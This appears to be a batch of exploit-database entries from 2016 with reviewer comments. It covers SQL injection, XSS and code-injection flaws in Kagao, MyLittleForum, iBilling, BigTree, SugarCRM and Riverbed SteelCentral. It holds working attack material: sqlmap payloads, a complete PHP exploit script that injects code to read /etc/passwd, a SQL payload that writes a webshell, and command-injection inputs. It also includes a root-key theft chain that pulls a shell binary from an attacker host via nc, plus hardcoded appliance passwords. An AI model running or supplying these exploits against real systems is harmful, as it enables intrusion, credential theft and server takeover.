24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...
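Review bot: the "File:" line says zanzam.php but the dork and the test URL use zaznam.php; fix the file name. The evidence is a Firebird error (SQL error code -104, Unexpected end of command) triggered by a single quote in detail_num, which shows the value reaches ibase_query() unparameterised but not that data was extracted, so the entry should either state what was retrieved or describe itself as an error-based indicator. "Product Version -> / All" is vague; state the version tested. The code-level fix is a prepared statement (ibase_prepare/ibase_execute) or an integer cast on detail_num.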

platforms/php/webapps/40019.txt Executable file

@ -0,0 +1,88 @@
######################
# Application Name : Kagao v3.0 - Professional Classified Market
# Google Dork : inurl:/cat1.php?id2=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Vendor Homepage : http://kogaoscript.com/
# Vulnerable Type : SQL Injection & Cross Site Scripting
# Date : 2016-06-26
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/cat1.php
######################
# Vulnerable code :
function pagenat(){
$buildLink = array(
"id" => intval($_GET['id']),
"id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '',
"suche" => htmlspecialchars($_GET['suche']),
"sucheWo" => htmlspecialchars($_GET['sucheWo']),
"umkreis" => intval($_GET['umkreis']),
"page" => ""
);
$buildLink = http_build_query($buildLink);
$buildLink = 'cat1.php?' . $buildLink;
if($_GET['id2']){
$pages_num = getZahlPage($_GET['id2'], 'unterkategorie');
}
else{
$pages_num = getZahlPage($_GET['id'], 'kategorie');
}
$page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1;
$pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : '';
echo $pages;
}
######################
# PoC Exploit:
http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast
Parameter: id2 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN
---
###################### Cross Site Scripting Vulnerability ######################
# PoC Exploit:
Search: "><script>alert('n4tural');</script>
http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0
######################
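Review bot: the excerpt labelled vulnerable code does not contain the injection: pagenat() applies intval() to id2 when building the link but then passes the raw $_GET['id2'] to getZahlPage(), whose query is not shown; include getZahlPage() so the sink is visible. The sqlmap payloads (id2=10" AND ...) indicate the value is interpolated inside double quotes, consistent with string concatenation there. Likewise suche goes through htmlspecialchars() in this function, so the reflected XSS must come from a different output point, which should be cited. The fix for both is the one the link-building code already applies: use the cast value (or a prepared statement) in the query and escape at every output. Minor: the vendor site is kogaoscript.com while the product is written Kagao.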

platforms/php/webapps/40021.php Executable file

@ -0,0 +1,225 @@
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=================
mylittleforum.net
Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5
Product:
===================
MyLittleForum 2.3.5
my little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity.
Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.
Vulnerability Type:
=======================
PHP Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
When setting up mylittleforum CMS users will have to walk thru an
installation script and provide details for the application like the
forums email address, name, admin email, admin password, database name
etc...
However, no input validation / checks exists for that installation script.
Low privileged users can then supply arbitrary PHP code for
the Database Name. The PHP command values will get written to the
config/db_settings.php file and processed by the application. Since
we supply an invalid Database Name a MySQL error will be thrown but the
injected PHP payload will also be executed on the host system.
If the CMS is installed by low privileged user and that user has basic
MySQL database authorization to run the install for the CMS it
can result in a privilege escalation, remote command execution and complete
takeover of the host server.
The /config/db_settings.php is protected by .htaccess file but we can write
directly to "db_settings.php" file and execute code directly
from /install/index.php file bypassing any access control provided by the
.htaccess file or we just delete it by adding call to PHP function
@unlink('.htaccess') to our injected PHP payload.
1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php
2) For Database Name input field enter the below PHP code for POC.
';?><?php echo passthru('/bin/cat /etc/passwd');'
This results in config/db_settings.php file being injected with our
arbitrary PHP code.
$db_settings['database'] = '';?><?php echo passthru('/bin/cat
/etc/passwd');'';
3) Make another HTTP GET request to same page "/install/index.php" file and
done!... we access /etc/passwd system file.
HTTP/1.1 200 OK
Date: Fri, 24 Jun 2016 03:01:13 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1m PHP/5.6.8 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.8
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
etc...
Exploit code(s):
===============
1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc...
2) Run below PHP script from Command line from remote work station
3) BOOM we can now read Linux "/etc/passwd" file on remote server
*/
<?php
#mylittleforum-2.3.5 PHP CMD Execution Exploit
#by hyp3rlinx
#ISR: apparitionsec
#hyp3rlinx.altervista.org
#cat Linux system file '/etc/passwd' POC
#tested RH Linux 5
#=======================================================
if($argc<5){
echo "myLittleForum CMS PHP Command Execution Exploit\r\n";
echo "Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>\r\n";
echo "================= by hyp3rlinx ===================\r\n";
exit();
}
$port=80; #Default port
$victim=$argv[1]; #IP
$user=$argv[2]; #MySQL username
$pwd=$argv[3]; #MySQL password
$root_dir=$argv[4]; #/mylittleforum-2.3.5
$uri="/install/index.php"; #PHP CMD inject entry point
$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}
$CMD_INJECTTION="forum_name=PWN".
"&forum_address=http://$victim/$root_dir/".
"&forum_email=x@x.com".
"&admin_name=$user".
"&admin_email=x@x.com".
"&admin_pw=$pwd".
"&admin_pw_conf=$pwd".
"&host=localhost".
"&database=';?><?php echo passthru('/bin/cat /etc/passwd');'".
"&user=$user".
"&password=$pwd".
"&table_prefix=mlf2_".
"&install_submit=OK+-+Install+forum".
"&language_file=english.lang";
#Inject commands
$out = "POST /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($CMD_INJECTTION) . "\r\n";
$out .= "Connection: close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $CMD_INJECTTION);
fclose($s);
sleep(2);
#Second HTTP request to read Linux /etc/passwd file in the response
$out="";
$s = fsockopen($victim, $port, $errno, $errstr, 10);
$out = "GET /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
$r='';
while (!feof($s)) {
$r=fgets($s, 128);
echo $r;
if(strpos($r,'<!DOCTYPE')!==FALSE){
break;
}
}
fclose($s);
?>
/*
Disclosure Timeline:
=================================
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===========================================
(High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/
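Review bot: the second connection at `$s = fsockopen($victim, $port, $errno, $errstr, 10);` (the one before the GET that reads back the response) is never checked, unlike the first one guarded by `if(!$s){echo "Cant connect to the server!"; exit();}`, so a refused connection turns into fwrite/fgets warnings on a false handle instead of a clean exit; repeat the check there. Two documentation points: the usage line `Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>` shows comma-separated arguments while the script reads four space-separated argv positions, and the header comment should state the precondition that `/install/index.php` is still reachable after setup, since removing the install directory is the obvious hardening step for deployments that cannot patch. Style: `$CMD_INJECTTION` is misspelled throughout.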

57
platforms/php/webapps/40022.txt Executable file

@ -0,0 +1,57 @@
iBilling v3.7.0 Multiple Stored and Reflected Cross Site Scripting Vulnerabilities
Vendor: iBilling
Product web page: http://www.ibilling.io/
Affected version: 3.7.0
Summary: The features you want, the simplicity you need! Beautifully
designed for best User Interface & User Experience. The software
That Works For YOUR Business! Get growing with affordable, scalable
business software. Find innovative ways to manage customers data,
communicate with customer, know your business cashflow, net worth,
send invoice to customer Hassle-free with single click payment reminder,
payment confirmations & get paid online integrated with payment gateways.
Desc: iBilling suffers from multiple cross-site scripting vulnerabilities.
The issue is triggered when input passed via multiple parameters is not
properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: nginx
PHP/5.5.9-1ubuntu4.6
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
@zeroscience
Advisory ID: ZSL-2016-5332
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5332.php
08.06.2016
1. Cross Site Scripting (Stored):
http://localhost/ibilling/index.php
Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)
Payload(s):
account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&email=test%40yahoo.com&phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&country=TR&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ibilling/index.php
Parameters: cid (POST)
Payload(s):
cid=1001"><script>alert(1)</script>&msg=&icon=
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
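Review bot: the stored XSS section lists `Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)` but the payload that follows only exercises account, company, phone, address, city, state, zip and tags; either add PoC values for msg, desc, description and ref or drop them from the list, so whoever validates a fix knows which fields were actually confirmed. The target is given only as `http://localhost/ibilling/index.php` for both findings, without the action or page parameter that routes the POST, so the requests are not reproducible as written. The entry also carries no vendor notification or fix status, just the date `08.06.2016`; add that status next to the ZSL-2016-5332 advisory URL.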

181
platforms/php/webapps/40024.txt Executable file

@ -0,0 +1,181 @@
1. ADVISORY INFORMATION
========================================
Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Application: BigTree CMS
Remotely Exploitable: Yes
Versions Affected: < 4.2.11
Vendor URL: https://www.bigtreecms.org
Bugs: SQL Injection
Author: Mehmet Ince
Date of found: 27 Jun 2016
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS.
Netsparker was used for initial detection.
3. DETAILS
========================================
Following codes shows $page variable is used at inside SQL query without
proper escaping nor PDO.
File : /core/inc/bigtree/admin.php
Lines 6866 - 6879
function submitPageChange($page,$changes) {
if ($page[0] == "p") {
// It's still pending...
$type = "NEW";
$pending = true;
$existing_page = array();
$existing_pending_change = array("id" => substr($page,1));
} else {
// It's an existing page
$type = "EDIT";
$pending = false;
$existing_page = BigTreeCMS::getPage($page);
$existing_pending_change = sqlfetch(sqlquery("SELECT id FROM
bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id =
'$page'"));
}
...
}
Basically submitPageChange function is vulnerable against SQL Injection
vulnerability. This function was used twice during development. Following
list shows location of these function callers.
/core/admin/modules/pages/front-end-update.php
/core/admin/modules/pages/update.php
PoC:
Following HTTP POST request was used in order to exploit the SQL Injection
flaw.
POST /site/index.php/admin/pages/update/ HTTP/1.1
Cache-Control: no-cache
Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=;
bigtree_admin[email]=mehmet%40mehmetince.net;
bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D;
PHPSESSID=lsrbe949jc3na5j1sof19a3s53
Host: 10.0.0.154
Accept-Encoding: gzip, deflate
Content-Length: 2248
Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="_bigtree_post_check"
success
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="page"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="nav_title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="publish_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="expire_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="in_nav"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="redirect_lower"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="trunk"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="external"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="new_window"
Yes
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="resources[page_header]"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="tag_entry"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="route"
trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="seo_invisible"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="ptype"
Save
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="max_age"
3
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="template"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_keywords"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_description"
--b788b047b8e345b792cdc1f81fef2106--
4. TIMELINE
========================================
27 Jun 2016 - Netsparker identified SQL Injection.
27 Jun 2016 - Source code review and finding root cause of SQLi.
27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
27 Jun 2016 - Pull Request has been sended.
https://github.com/bigtreecms/BigTree-CMS/pull/256
--
Sr. Information Security Engineer
https://www.mehmetince.net
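Review bot: the affected range is inconsistent: the title says `BigTree CMS <= 4.2.11` while the header says `Versions Affected: < 4.2.11`; settle on one and state which release carries the fix from https://github.com/bigtreecms/BigTree-CMS/pull/256. In the excerpt only the else branch interpolates the parameter unescaped (`item_id = '$page'`); the pending branch feeds `substr($page,1)` into an array with no query shown, so say whether that path also reaches SQL or trim the excerpt to the vulnerable lines. Minor: the PoC Cookie header carries `PHPSESSID` twice.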

83
platforms/php/webapps/40027.txt Executable file

@ -0,0 +1,83 @@
---------------------------------------------------------
SugarCRM <= 6.5.18 Two PHP Code Injection Vulnerabilities
---------------------------------------------------------
[-] Software Link:
http://www.sugarcrm.com/
[-] Affected Versions:
Version 6.5.18 CE and prior versions.
[-] Vulnerabilities Description:
1) The vulnerable code is located in the /include/utils/array_utils.php script:
99. function override_value_to_string_recursive2($array_name, $value_name, $value, $save_empty = true) {
100. if (is_array($value)) {
101. $str = '';
102. $newArrayName = $array_name . "['$value_name']";
103. foreach($value as $key=>$val) {
104. $str.= override_value_to_string_recursive2($newArrayName, $key, $val, $save_empty);
105. }
106. return $str;
107. } else {
108. if(!$save_empty && empty($value)){
109. return;
110. }else{
111. return "\$$array_name" . "['$value_name'] = " . var_export($value, true) . ";\n";
112. }
113. }
114. }
The "override_value_to_string_recursive2()" function is being used to save an array into a configuration file with a .php
extension. However, this function does not properly escape key names, and this can be exploited to inject and execute
arbitrary PHP code through e.g. the following URL, which will write arbitrary PHP code into the config_override.php file:
http://[host]/[sugar]/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1
2) The vulnerable code is located in the /modules/UpgradeWizard/upload.php script:
117. $manifest_file = extractManifest($tempFile);
118.
119. if(is_file($manifest_file)) {
120. require_once( $manifest_file );
The vulnerability is caused by the Upgrade Wizard module, which allows to upload a package with an arbitrary manifest.php
file that will be executed by the application. This can be exploited by authenticated administrator users to upload and
execute arbitrary PHP code.
[-] Solution:
Update to version 6.5.19 CE or higher to mitigate the first vulnerability.
No official solution is currently available for the second vulnerability.
[-] Disclosure Timeline:
[29/10/2014] - Vendor notified
[15/12/2014] - Version 6.5.19 CE released: http://bit.do/sugar6519
[29/04/2015] - CVE number requested
[23/06/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-05
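Review bot: the root cause is visible at line 111, where `$value` goes through var_export() but `$value_name` is concatenated raw into `['$value_name']`; the sentence "does not properly escape key names" should point at that line so the change in 6.5.19 CE can be checked against it. For issue 2 the text itself notes that the Upgrade Wizard path requires an authenticated administrator, and installing a package that ships a manifest.php is what that module does; the entry should spell out which control is bypassed (for instance whether any validation of the package is expected before `require_once( $manifest_file );` runs) or rate it as an admin-only issue, otherwise "No official solution is currently available" reads as a missing patch. Replace the `http://bit.do/sugar6519` shortener with the vendor release URL so the timeline stays verifiable.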

258
platforms/php/webapps/40028.txt Executable file

@ -0,0 +1,258 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities
Affected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral
NetExpress <= 10.8.7
PDF:
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
+-----------+
|Description|
+-----------+
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,
which share the same code base, are affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection, privilege escalation,
local file inclusion, account hijacking and hardcoded default
credentials. Details for other low severity vulnerabilities (i.e.
cross-site scripting) are available in the accompanying PDF.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The username POST parameter in the login method of the common REST API
is vulnerable to SQL injection via stacked queries. An attacker can
exploit this vulnerability to add a user account in the applications
PostgreSQL database and successfully bypass authentication. The
exploitation of this vulnerability can also be replicated from the main
web GUI login functionality as login calls are routed to the same common
REST API web service.
The proof-of-concept request below shows how to exploit the SQL
injection vulnerability to add a malicious user account into the users
table of the application database. Since quote characters can't be used
as part of the injection payload, an attacker needs to use string
concatenation to insert the field values (i.e. 'user' =>
CHR(117)||CHR(115)||CHR(101)||CHR(114)).
[POC SQL INJECTION - INSERT USER]
Method => POST
URL => /api/common/1.0/login
Content-type => application/json
Payload => {
"username": "test%';INSERT INTO users (username, password, uid) VALUES
(<user>, <SHA512 hash>, <random id>);--",
"password": ""
}
Additional SQL Injection vulnerabilities exist in the applications web
interface and can be exploited after authentication.
Method => GET
URL => /popup.php?page=export_report
Parameter => report_id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => GET
URL => /popup.php?page=algorithm_settings
Parameter => id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_names
POC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND
('Pdyu'='Pdyu
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_numbers
POC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_proto
POC Payload => ');SELECT PG_SLEEP(5)--
All the SQL injections above can be trivially exploited to write
malicious PHP code into a directory under the application web root
folder, such as one used for file uploads, and obtain arbitrary code
execution.
[POC SQL INJECTION - WRITE WEBSHELL]
GET
/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)
||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)
||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)
||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)
||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--
&export_type=3
==Command Injection==
Multiple command injection vulnerabilities exist in the appliances web
interfaces due to unsanitized user-supplied input passed as argument to
shell functions. An attacker can exploit these vulnerabilities to inject
shell commands and obtain arbitrary code execution.
URL => GET
/popup.php?page=test_connection&device=<PAYLOAD>&type=switch
Parameter => device
POC Payload => 1; touch /tmp/FILE;
URL => POST /index.php?page=licenses
Body => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => LICENSE-TOKEN; id;
Notes => Token Request functionality in 'Licenses' page
URL => GET /popup.php?page=packet_export&query=<PAYLOAD>
Parameter => query
POC Payload => 1; touch /tmp/MYFILE;
URL => POST /index.php?page=network_config
Body => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>
Parameter => Setup/setup/network_hostname
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Configure now' functionality, injection occurs after
appliance reboots.
URL => POST /index.php?page=product_info
Body => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Delete collected entry' functionality
==Privilege Escalation==
An insecure configuration of the /etc/sudoers file allows privilege
escalation to root. The apache user is allowed to run multiple scripts
under the /usr/mazu/bin directory without being prompted for a password,
including the following sudoers entry:
/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*
The mazu-run script can be used to invoke the /bin/date binary in the
context of the built-in mazu user. An attacker can abuse the mazu-run
script to run the /bin/date binary with the f flag against a sensitive
file such as the root private SSH key. The f option instructs the
date binary to parse the file specified as a DATEFILE. By default, the
command date will echo back an error message with the contents of the
specified file when this does not comply with a valid DATEFILE format.
This technique can be exploited to get the root SSH private RSA key and
write it into the appliance filesystem using output redirection. An
attacker can then establish a SSH connection to the target system by
using the dumped private key to authenticate as root and spawn a root
reverse shell. The POC payload below shows how to exploit the vulnerability.
[POC PRIVILEGE ESCALATION]
sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f
/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-
| tr -d '`' | tr -d "'" > /tmp/root_ssh_privatekey; chmod 600
/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null
-o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey root@localhost
'nc -n [attacker ip] 4444 > /tmp/shell.elf;
chmod 755 /tmp/shell.elf; /tmp/shell.elf';
==Local File Inclusion==
A local file inclusion vulnerability exists in the
sensor/ta_loader.php file due to a lack of input sanization for the
GET parameter class. This allows an attacker to read or include
arbitrary files.
As a practical exploitation scenario, an attacker can obtain arbitrary
code execution through the LFI vulnerability by first using the Edit
/etc/hosts functionality available under
/index.php?page=network_config to create a fake host entry (e.g.
'192.1.2.3 <?php echo system($_GET["cmd"]); ?>' ) and write malicious
PHP code on the appliance filesystem, then include the /etc/hosts file
and execute arbitrary shell commands.
[POC LFI]
curl https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts
==Account Hijacking==
The password change functionality under the
/index.php?page=security_compliance page is vulnerable to a logic bug
which allows account hijacking via arbitrary password reset. Although
the functionality prompts for the current account password before
allowing the user to set a new password, the hashed credentials of all
the system accounts on the SteelCentral NetProfiler and NetExpress
appliances are disclosed within the accountscredentialsid hidden
parameter in the page source code. The contents of the parameter are the
base64-encoded representation of a serialized PHP object containing the
credentials data.
This not only openly discloses the contents of the /etc/shadow file, but
can be also abused to carry out arbitrary password resets since the
current password verification is carried out on client-side against the
oldpassword field value within the serialized string. An attacker can
first generate a valid SHA-512 hash for an arbitrary current password
value along with computing the hash length. Then the password change
HTTP request can be intercepted to decode the base64-encoded serialized
object and modify the oldpassword hash value and its length for the
target system account to hijack with the generated SHA-512 hash of the
chosen current password value. The malicious string can now be base64
encoded back and used to replace the original request string.
After clicking the Configure Now button the application will validate
the current password value provided through the web interface against
the injected hash value, successfully setting the new password to the
arbitrary value chosen by the attacker.
==Hardcoded default credentials==
Multiple system accounts are configured on every deployment of the
SteelCentral NetProfiler and NetExpress virtual appliances with the same
hardcoded default credentials publicly available on the web.
Users => mazu, dhcp, root
Password => bb!nmp4y
The default mazu user sudo configuration allows the execution of all
shell commands as root without being prompted for a password. The user
'mazu' is the only privileged user account having remote SSH access to
the SteelCentral NetProfiler and NetExpress appliances (root SSH access
is restricted to localhost only). However, the application does not
enforce a password change for the built-in 'mazu' user during
configuration time or after the first login. These insecure settings can
be exploited as a remote backdoor to gain a privileged SSH shell to the
target system.
+----------+
| Solution |
+----------+
Upgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.
At the time of this writing, although the account hijacking
vulnerability has been resolved, the contents of the /etc/shadow file
are still disclosed in the hidden parameter originalsettingsid when
browsing to /index.php?page=security_compliance.
+------------+
| Timeline |
+------------+
24/03/2016 Initial disclosure to Riverbed.
25/03/2016 Vendor confirms receipt of advisory.
18/04/2016 Sent follow up email asking for a status update
19/04/2016 Vendor replies engineering team is working on software patches.
13/06/2016 Vendor releases patched software build.
27/06/2016 Public Disclosure
+------------+
| Additional |
+------------+
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
